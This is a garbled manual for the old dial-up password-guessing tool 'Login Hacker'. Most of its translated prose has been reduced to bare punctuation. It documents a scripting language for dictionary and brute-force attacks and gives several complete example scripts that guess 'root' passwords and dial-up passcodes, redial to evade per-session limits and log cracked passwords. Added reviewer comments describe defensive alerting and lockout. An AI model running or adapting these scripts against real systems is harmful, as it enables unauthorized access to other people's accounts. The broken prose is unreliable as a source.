,
.
? , , .
,
.
, . ,
. . .
.
. ,
- . , Unix
(auth.crit):
CRITICAL. NetWare
. ,
,
.
, ,
.
, , .
,
, . ,
.
? ,
( ),
. ,
, ,
, 123, "secret" .. Unix ,
, finger
telnet smtp-
.
,
, "PASSWORD:".
.
: Silent Carriers.
Login Hacker.
LOGINH.EXE
Login Hacker.
LH-COMP.EXE
.
X00.EXE
Fossil. .
: X00.EXE E 2
FILE_ID.DIZ
.
HISTORY.DOC
.
LOGINH.DOC
.
SCRIPT.DOC
.
RESULT.DOC
, Login Hacker.
UPDATE.DOC
, .
VH_BASE.DIC
.
LH&SCAVE.TXT
, Scavenger Dialer.
THC&SCAV.SCR SCAVENGER
, LH&SCAVE.TXT.
REBREAK.SCR
Scavenger-. LH&SCAVE.TXT.
HANGUP.SCR
, LH&SCAVE.TXT.
PICKUP.SCR
, LH&SCAVE.TXT.
THC-LH_1.TXT
, .
THC-LH_2.TXT
, .
DEC-SERV.TXT
(: Tron).
PASSCODE.TXT
(: Mind Maniac).
THC.NFO
! , .
LORE.COM
LORE BBS (: Plasmoid).
LOGINH.CFG
.
LOGINH.LOG
.
, .
Hacking
Setup.
LOGINH.SCR
, LH-COMP.EXE.
Login Hacker.
LOGINH.HCK
,
. ,
Brute Force Generator.
, ,
.
. ,
. .
, ,
.
Login Hacker
:
LOGINH.EXE [scriptfile]/[anything] [-Auto] [-Shh:mm] [-Ehh:mm]
[scriptfile]
scriptfile
.
[anything]
,
.
[-Auto]
.
[-Shh:mm]
, .
[-Ehh:mm]
, .
[-T]
.
.
[-D]
. ,
.
, Login Hacker
:
LH-COMP.EXE [scriptfile]
[scriptfile]
, .
Login Hacker
, :
L
.
S
.
T
.
I
.
Q
.
, .
, , .
, ,
- . , CONNECT,
ALARM, HANGUP ERROR .
, Print Logoutput
to Screen too.
On-line
ESC
.
F1
.
ALT-B
. .
ALT-C
.
ALT-D
.
ALT-H
HangUp.
ALT-I
.
ALT-J
DOS ( -).
ALT-L
.
ALT-T
. ,
.
( ESC).
, ALT-T ALT-X.
-- Login Hacker. ,
, .
,
.
,
. 99%,
.
, .
, -- . ,
-- .
, # ,
.
#DEFINE .
#NOCARRIER
, hangup.
#START .
#END .
.
logfile phone_nr. -
, , .
LOGFILE=FILENAME
.
.
:
LOGFILE=C:\OUTPUT\NY-SYS5.LOG
PHONE_NR=NUMBER
DIAL.
, . ,
.
:
PHONE_NR=1-800-WHO-CARES
INIT_MODEM=STRING
Pulse Dialing,
P.
,
AT ( Hacker Setup).
:
INIT_MODEM=Z
( AT Z)
INIT_DATA=STRING
,
. ,
Hacker Setup.
8N1 7E1,
. -- 7 8,
. P (
), E ( ) N (
). ,
:
7/8+E/P/N+1/2.
DIAL_TRIES=NUMBER
0 65535. .
, HANGUP .
:
DIAL_TRIES=3
Standard : 0
: ,
, LOGINH.CFG.
LOGIN_TRIES=NUMBER
0 2300000000.
.
(EOF),
. ,
SEND_NEXT_DIC, NEXT_DIC
Brute Force Generator.
:
LOGIN_TRIES=0
Standard: 0
: ,
, LOGINH.CFG.
DIC(NUMBER)=FILENAME
, .
DIC .
.
Send_Next_DIC (1), Send_DIC (1) Next_DIC (1).
:
DIC(1)=C:\HACKING\DICTIONA.RY\BAD_PWS.DIC
FROM_DIC(NUMBER)=STRING
,
.
: FROM_DIC(1)=Tracy
BRUTE(NUMBER)=STRING,NUMBER,NUMBER,NUMBER
Brute Force Generator .
Brute Force Generator . Brute Force
Generator .
.
1
a= .
A= .
1=.
$=.
^= .
ASCII.
2
, ,
1 .
, 1
, 2.
. , .
3
,
Brute Force Generator.
4
,
Brute Force Generator.
: 1,
12.
, Brute
Force Generator.
Next_Brute(1), Send_Next_Brute(1) Send_Brute(1).
:
BRUTE(1)=a,1,1,6
Brute Force Generator
: ; ,
; ,
-- .
FROM_BRUTE(number)=STRING
Brute Force Generator.
: ,
1 8 , 1 3
, aaaa, aaab, aaac
..
:
FROM_BRUTE(1)=2527
#NOCARRIER
,
HANGUP. GOTO (*START) GOTO (1),
. ,
. DIAL_TRIES.
#START
,
.
LOG(STRING)
LOG() .
, ,
$ ( ), .
LOG() .
:
LOG(Beginning on $DATE * $TIME)
:
"Beginning on 24-12-96 * 23:00"
LOG_(STRING)
, ,
CRLF (End-Of-Line).
:NUMBER
, : () GOTO.
240 1 240.
.
GOTO, GOSUB, CHECK4OUTPUT CHECK4CARRIER.
: :1
1.
GOTO(NUMBER)
.
#START, #NOCARRIER #END.
: GOTO(#END) ( ).
GOSUB(NUMBER)
GOSUB
. GOSUB,
, , GOSUB RETURN
. , :
GOSUB(#END).
: GOSUB(4)
RETURN
.
,
GOSUB .
RETURN
GOSUB, .
255 GOSUB.
: RETURN
CHECK4CARRIER(NUMBER)
,
.
( GOTO).
, TRUE
NO_CARRIERS.
*NOCARRIER, *START *END.
ON OFF. CHECK4CARRIER(ON)
, , , NOT,
*NoCarrier.
, CHECK4CARRIER(OFF)
DIAL, (
SCAVENGER DIALER).
:
CHECK4CARRIER(#NOCARRIER)
CHECK4CARRIER(5)
CHECK4CARRIER(ON)
CHECK4CARRIER(OFF)
CHECK4OUTPUT(NUMBER)
ALARM:
(OUTPUT) ,
.
*NOCARRIER, *START *END. OFF,
.
:
CHECK4OUTPUT(#NOCARRIER)
CHECK4OUTPUT(5)
CHECK4OUTPUT(OFF)
DIAL
PHONE_NR. ,
: " !".
: DIAL
HANGUP
.
: HANGUP
WAIT4STRING(NUMBER,STRING,NUMBER,
COMMAND,STRING)
.
.
.
, , -- ,
, -- ,
, .
: WAIT4STRING
. : WAIT4STRING(a,b,c,d,e).
a
0 255 .
,
TOTAL TIMEOUT ( #NOCARRIER ,
).
, ,
- .
b
,
.
c
,
. : 0 255 (0=, 1=
).
d
. ,
: ALARM, WAIT4STRING IF.
e
.
.
: WAIT4STRING(15,^M,2,GOTO(1),ogin:)
ogin:
15 . , (^M),
15 ,
ogin:.
15 , ,
GOTO 1.
LOG_SESSION_ON
,
.
: LOG_SESSION_ON
LOG_SESSION_OFF
,
.
: LOG_SESSION_OFF
SEND(STRING)
SEND .
$.
.
, .
:
SEND(echo Hacked you system Time: $TIME - Date:
$DATE > HACKED.TXT)
SEND :
echo HAcked your system Time: 23:00 - Date: 24-12-95 > HACKED.TXT
SEND_()
,
^M. ,
+++.
:
SEND_(n)
SEND_(+++)
SEND_NEXT_DIC(NUMBER)
: SEND_NEXT_DIC(1)
SEND_DIC(NUMBER)
.
: SEND_DIC(1)
NEXT_DIC(NUMBER)
, NUMBER.
: NEXT_DIC(1)
SEND_NEXT_BRUTE(NUMBER)
Brute Force Generator,
.
: SEND_NEXT_BRUTE(1)
SEND_BRUTE(NUMBER)
Brute Force Generator.
: SEND_BRUTE(1)
NEXT_BRUTE(NUMBER)
Brute Force Generator.
: NEXT_BRUTE(1)
IF VARIABLE OPERATOR STRING THEN COMMAND
IF .
:
IF THEN
=,
< >
~.
.
, TRUE.
, WAIT4STRING.
:
IF STRING~ogin THEN GOTO(3)
, (STRING) (~)
ogin, (GOTO) 3.
EXECUTE(STRING)
DOS-, .
.
MS DOS. , $
.
: ,
, fossil.
. X00.EXE E 2
Login Hacker.
: ,
.
:
EXECUTE(C:\SB\VPLAY C:\SB\VOC\HACKED.VOC)
EXECUTE(COPY $LOGFILE C:\HACKED)
ALARM(STRING,COMMAND)
! !
, ,
.
STRING
,
.
COMMAND
. ,
WAIT4STRING.
, , BBS,
.
.
:
ALARM(chat,GOTO(#END))
SET VARIABLE=STRING
#START #NOCARRIER.
, .
: STRING, DIAL_TRIED,
LOGIN_TRIED, S_TMP D_TMP.
:
SET D_TMP=3
D_TMP 3.
INC(DIGIT_VARIABLE)
1.
,
.
: DIAL_TRIES, DIAL_TRIED, LOGIN_TRIES,
LOGIN_TRIED D_TMP.
: INC(D_TMP)
DEC(DIGIT_VARIABLE)
1.
,
.
: DIAL_TRIES, DIAL_TRIED, LOGIN_TRIES,
LOGIN_TRIED D_TMP.
:
DEC(D_TMP)
WAIT(NUMBER)
, , NUMBER.
NUMBER 1 65535.
: WAIT(10) ( )
WAIT_(NUMBER)
, ,
NUMBER. NUMBER 1
65535.
: WAIT_(500) ()
BEEP
, !
,
SEND() LOG(). ,
$ (),
, . #DEFINE
. .
STRING
.
STRING2
250 .
DIAL_TRIED
.
LOGIN_TRIED
.
TIME
( ).
, TIME=1505 15:05.
DATE
MMDD. , DATE=503 3 .
DIC(1)
1.
BRUTE(2)
Brute Force Generator 2.
S_TMP
. , .
D_TMP
. , .
IF SET
. #DEFINE .
IF! $
. SEND, LOG WAIT4STRING.
:
IF TIME>1215 THEN GOTO(#END)
( 12:15).
LOG($DIC(3))
SEND($S_TMP)
.
LOG, SEND WAIT4STRING
^ (). , , , ^M
^^ ... ?, ^A ^Z ^[ ^\ ^]
^^.
:
SEND_(^D)
#DEFINE
<>
#NOCARRIER
< >
#START
< >
#END
,
, .BAK.
.
:
WARNING
- .
, . ,
, , .
, .
ERROR
. -
.
.BAK .
#DEFINE
; Example script: dictionary guessing against a prompt containing "assw",
; run together with the external scavenge.exe dialer (see the EXECUTE lines).
; Reviewer note (defence): the script makes three guesses per connection
; (labels :2, :5 and :8) and then reconnects through :99, so a limit on
; attempts per session does not stop it on its own. Failed logins need to be
; counted per account and per line across connections, and alerted on.
PHONE_NR=,
LOGFILE=lh&scave.log
; DIC(1) is the word list consumed by SEND_NEXT_DIC(1) below.
DIC(1)=d:\project\hack\word\badpws.dic
;
#NOCARRIER
; Runs when the carrier is lost: optionally hang up through the dialer,
; record date and time in the log file, then start again.
IF S_TMP=DEFINE THEN EXECUTE(scavenge.exe /nooutput /s hangup.scr)
LOG(Carrier lost on $DATE at $TIME)
LOG()
GOTO(#START)
#START
; S_TMP is used as a switch: DEFINE routes line handling through the
; scavenge.exe helper scripts, UNDEFINE uses plain modem commands.
SET S_TMP=UNDEFINE
;SET S_TMP=DEFINE
HANGUP
LOG_SESSION_ON
; Presumably clears the buffer of received text before the new attempt.
SET STRING2=
IF S_TMP=DEFINE THEN EXECUTE(scavenge.exe /nooutput /s pickup.scr)
IF S_TMP=UNDEFINE THEN SEND(AT H1)
EXECUTE(scavenge.exe /nooutput /s thc&scav.scr)
:111
SEND(ATD)
SET D_TMP=0
:112
; Poll for a carrier; D_TMP counts the polls and the script gives up after
; 50 of them. CHECK4CARRIER(112) presumably jumps back to :112 while no
; carrier is present - confirm against the CHECK4CARRIER description.
WAIT(1)
INC(D_TMP)
IF D_TMP>50 THEN GOTO(99)
CHECK4CARRIER(112)
SEND()
;
:1
; First guess: wait until the received text contains "assw".
WAIT(1)
IF STRING2~assw THEN GOTO(2)
GOTO(1)
:2
; Send the next word; "ncorr" in the reply is treated as a rejection,
; anything else is treated as success (:50).
SEND_NEXT_DIC(1)
WAIT(2)
IF STRING2~ncorr THEN GOTO(3)
GOTO(50)
:3
SET STRING2=
:4
; Second guess, same pattern as :1/:2.
WAIT(1)
IF STRING2~assw THEN GOTO(5)
GOTO(4)
:5
SEND_NEXT_DIC(1)
WAIT(2)
IF STRING2~ncorr THEN GOTO(6)
GOTO(50)
:6
SET STRING2=
:7
; Third guess; after a rejection the script falls through to :99.
WAIT(1)
IF STRING2~assw THEN GOTO(8)
GOTO(7)
:8
SEND_NEXT_DIC(1)
WAIT4STRING(10,,1,GOTO(50),ncorr)
GOTO(99)
:50
; Success path: the accepted word is written to the log file in clear text.
BEEP
BEEP
BEEP
LOG(------------- -----------------)---- -------------------)
LOG($DATE $TIME)
LOG()
LOG(PASSWORD: $DIC(1))
LOG()
GOTO(150)
:99
; All three guesses rejected or no carrier: turn carrier checking off and
; reconnect for the next round.
CHECK4CARRIER(OFF)
IF S_TMP=UNDEFINE THEN GOTO(#START)
EXECUTE(scavenge.exe /s rebreak.scr)
;
GOTO(111)
:150
IF S_TMP=DEFINE THEN EXECUTE(scavenge.exe /nooutput /s hangup.scr)
GOTO(#END)
#END
: UNIX F.
.
#DEFINE
; Example script: dictionary guessing of the "root" password on a host that
; is reached with a CONNECT command after dialing in.
; Reviewer note (defence): every pass through :3 is one failed login for the
; same account. Repeated root failures from a single line are the signal to
; alert on. Refusing direct root logins on dial-up and terminal lines, and
; locking or delaying after a few failures, removes the target.
LOGFILE=C:\OUTPUT\NY-SYS5.LOG
PHONE_NR=I dont tell you ;)
DIAL_TRIES=3
LOGIN_TRIES=0
; DIC(1) is the word list consumed by SEND_NEXT_DIC(1) below.
DIC(1)=C:\HACKING\DICTIONA.RY\BAD_PWS.DIC
#NOCARRIER
; Runs when the carrier is lost: log the time and the current word,
; then start again.
BEEP
BEEP
BEEP
LOG(NO CARRIER)
LOG(ON $DATE $TIME)
LOG(AT $DIC(1))
LOG()
GOTO(#START)
#START
LOG(------------------------- -----)---- -------------------)
LOG(TARGET : $PHONE_NR ON $DATE - $TIME)
LOG()
:1
; Dial PHONE_NR and wait for a prompt containing "name"; on failure the
; WAIT4STRING fallback command returns to :1 and dials again.
LOG(Dialing ...)
DIAL
LOG($STRING)
LOG_SESSION_ON
SEND()
SEND()
WAIT4STRING(15,^M,4,GOTO(1),name)
SEND( )
LOG_SESSION_OFF
:2
SEND(CONNECT HACK.THIS.SYSTEM.EDU)
:3
; One login attempt: account name "root", then the next dictionary word.
WAIT4STRING(30,^C,1,GOTO(2),ogin:)
SEND(root)
WAIT4STRING(20,^D,1,GOTO(2),assword:)
SEND_NEXT_DIC(1)
; A new "ogin:" prompt is treated as a rejection, "refused" as a dropped
; connection; any other reply is treated as a successful login.
IF STRING~ogin: THEN GOTO(3)
IF STRING~refused THEN GOTO(2)
; Success path: account and password are written to the log in clear text.
LOG()
LOG($STRING)
LOG()
LOG(!!!!! WE GOT THROUGH !!!!!!)
LOG(Login : root)
LOG(Password : $DIC(1))
LOG()
BEEP
BEEP
BEEP
BEEP
BEEP
HANGUP
GOTO(#END)
#END
#DEFINE
; Example script: generated candidates sent to a prompt containing "PA".
; Reviewer note (defence): the loop at :2 keeps guessing on the same
; connection for as long as the prompt comes back. Disconnecting after a few
; wrong entries, adding a growing delay, and alerting on runs of failures
; from one line all interrupt it.
INIT_MODEM=AT&N15
INIT_DATA=7E1
LOGFILE=C:\OUTPUT\TELEKOM4.LOG
PHONE_NR=I dont tell you ;)
DIAL_TRIES=3
LOGIN_TRIES=0
; BRUTE(1): settings for candidate generator 1, presumably digits only with
; a maximum length of 12 - confirm against the BRUTE() parameter description.
BRUTE(1)=1,1,1,12
#NOCARRIER
; Runs when the carrier is lost: log the time and the current candidate,
; then start again.
BEEP
BEEP
BEEP
LOG(NO CARRIER)
LOG(ON $DATE $TIME)
LOG(AT $BRUTE(1))
LOG()
GOTO(#START)
#START
LOG(-----------------------------------)---- ---------------)
LOG(TARGET : $PHONE_NR ON $DATE - $TIME)
LOG()
:1
; Dial and wait for the prompt; the fallback command redials via :1.
LOG(Dialing ...)
HANGUP
DIAL
LOG($STRING)
WAIT4STRING(15,^M,4,GOTO(1),PA)
:2
; Send one candidate. If the "PA" prompt returns, loop; if it does not,
; the fallback command jumps to :3 and the candidate is treated as accepted.
SEND_NEXT_BRUTE(1)
WAIT4STRING(3,^M,2,GOTO(3),PA)
GOTO(2)
:3
; Success path: session logging is switched on, a few probe commands are
; sent, and the accepted value is written to the log in clear text.
LOG_SESSION_ON
SEND()
SEND(?)
SEND(HELP)
SEND(HILFE)
LOG()
LOG(!!!!! WE GOT THROUGH !!!!!!)
LOG(Password : $BRUTE(1))
LOG()
BEEP
BEEP
BEEP
BEEP
BEEP
HANGUP
GOTO(#END)
#END
0130-xxxxxx.
;
;
;
; 30xCrLf
; PASSCODE:*****
;
#DEFINE
; Example script: dictionary words sent to a prompt containing "PASS" on a
; dial-up number (masked on the page as 0130xxxxxx).
; Reviewer note (defence): each pass through :2 is one wrong passcode on the
; same connection. A service that hangs up after a small number of wrong
; entries and records the failures gives operators both a brake and a trace.
INIT_MODEM=AT &F L2
INIT_DATA=8N1
LOGFILE=xxxxxx.LOG
PHONE_NR=0130xxxxxx
DIAL_TRIES=5
LOGIN_TRIES=0
; DIC(1) is the word list consumed by SEND_NEXT_DIC(1) below.
DIC(1)=C:\2\thc-lh09\w1.w
#NOCARRIER
; Runs when the carrier is lost: log the time and the current word,
; then start again.
BEEP
BEEP
BEEP
LOG(NO CARRIER)
LOG(ON $DATE $TIME)
LOG(AT $DIC(1))
LOG()
GOTO(#START)
#START
LOG(------------------- ---------)---- -------------)
LOG(TARGET : $PHONE_NR ON $DATE - $TIME)
LOG()
:1
; Dial and wait for the prompt; the fallback command redials via :1.
LOG(Dialing ...)
HANGUP
DIAL
LOG($STRING)
WAIT4STRING(30,.^M,3,GOTO(1),PASS)
:2
; One attempt: reset STRING, send the next word and log it. If the "PASS"
; prompt returns, loop; otherwise the fallback command jumps to :3.
set string=
SEND_NEXT_DIC(1)
wait(1)
LOG($DIC(1))
; , !
WAIT4STRING(15,.^M,3,GOTO(3),PASS)
GOTO(2)
:3
; Success path: session logging is switched on, a few probe commands are
; sent, and the accepted word is written to the log in clear text.
LOG_SESSION_ON
SEND()
SEND(?)
SEND(HELP)
SEND()
LOG()
LOG(!!!!! WE GOT THROUGH !!!!!!)
LOG(Password : $DIC(1))
LOG()
BEEP
BEEP
BEEP
BEEP
BEEP
HANGUP
GOTO(#END)
#END
Telnet.
#DEFINE
; Example script: dictionary guessing of the "root" password on a host that
; is reached through an intermediate login ("sername>" and "ocal>" prompts)
; followed by a connect command.
; Reviewer note (defence): the intermediate account is reused for every
; round, so its session records show one user opening connection after
; connection to the same address. Together with repeated root failures on
; the target host, that is the pattern to alert on.
init_modem=z
init_data=8n1
LOGFILE=xxxxxx.log
PHONE_NR=xxxxxx
DIAL_TRIES=0
LOGIN_TRIES=0
; DIC(1) is the word list consumed by send_next_dic(1) below; the two
; further lists are commented out.
DIC(1)=D:\hackusr\dictbig.txt
;dic(2)=d:\hackusr\bigdict2.txt
;dic(3)=d:\hackusr\bigdict3.txt
#NOCARRIER
; Runs when the carrier is lost: log the time and the current word,
; then start again.
LOG(NO CARRIER)
LOG(ON $DATE $TIME)
LOG(AT $DIC(1))
LOG(returning ...)
GOTO(#START)
#START
HANGUP
LOG_SESSION_ON
LOG()
log()
log( HaCK ATTeMPT STaRTeD ......)
log()
log( TaRGeT: $PHONE_NR )
log( DaTe: $DATE )
log( TiMe: $TIME)
log()
log()
log( ......DiaLiNG)
dial
log()
log( ......CoNNeCTeD!)
log()
log()
wait(5)
:1
; Intermediate login: answer the "sername>" prompt, then wait for "ocal>".
wait4string(1,^M,5,goto(#start),sername>)
send(fh65)
:2
wait4string(1,^M,5,goto(#start),ocal>)
send(connect 189.25.56.7)
:3
; In every stage below, "sconnected" in the received text sends the script
; back to :2 to reconnect, and "ncorrect" sends it back to :3 for the next
; attempt.
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
wait4string(1,^C,5,goto(4),ogin:)
send(root)
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
:4
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
wait4string(1,^D,5,goto(4),assword:)
send_next_dic(1)
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
:5
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
:6
; Nine wait/check rounds: if neither marker appears in that time, the script
; falls through to :7 and treats the word as accepted.
wait(1)
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
wait(1)
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
wait(1)
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
wait(1)
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
wait(1)
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
wait(1)
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
wait(1)
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
wait(1)
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
wait(1)
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
:7
; Success path: beep and write the result block to the log file.
beep
beep
beep
beep
beep
beep
beep
beep
beep
log()
log()
log()
Log(...... HaCK ATTeMPT WaS SuCCeSSFuLL!!!!!!!!!!!!!!)
log()
log( TaRGeT: $PHONE_NR DaTe: $DATE TiMe: $TIME)
log()
log()
log()
log( ACCouNT: root)
log( PaSSWoRD: DIC(1))
log()
log()
log()
#END
Network User Address Attacker.
P/H/A. NUA Attacker Turbo C 2.0
. Network User Address Attacker
SprintNet. SprintNet
.
logfile
. ,
Net .
. ,
SND390.TXT .
, , , ,
.
UNIX. ,
, , P/H/A
, ,
.
NUAA.EXE
NUA Attacker.
NUAA.DOC
README.PHA
!
SND390.TXT
Net.
NUAA.CFG
.
NUAFILE.PHA
.
LOGFILE.PHA
, .
NUA, .
NUAfile Logfile . NUAFILE.PHA
LOGFILE.PHA -- ,
. , ,
,
EOF.
NUA Attacker :
C:\ >NUAA [/I]
/I
. ,
Begin attack ( ), NUA Attacker
( ,
Net @).
Setup
attack. .
Phone Number
Net (SND390.TXT).
Starting NUA
.
Ending NUA
.
Timeout
.
Log filename
,
.
NUA filename
, (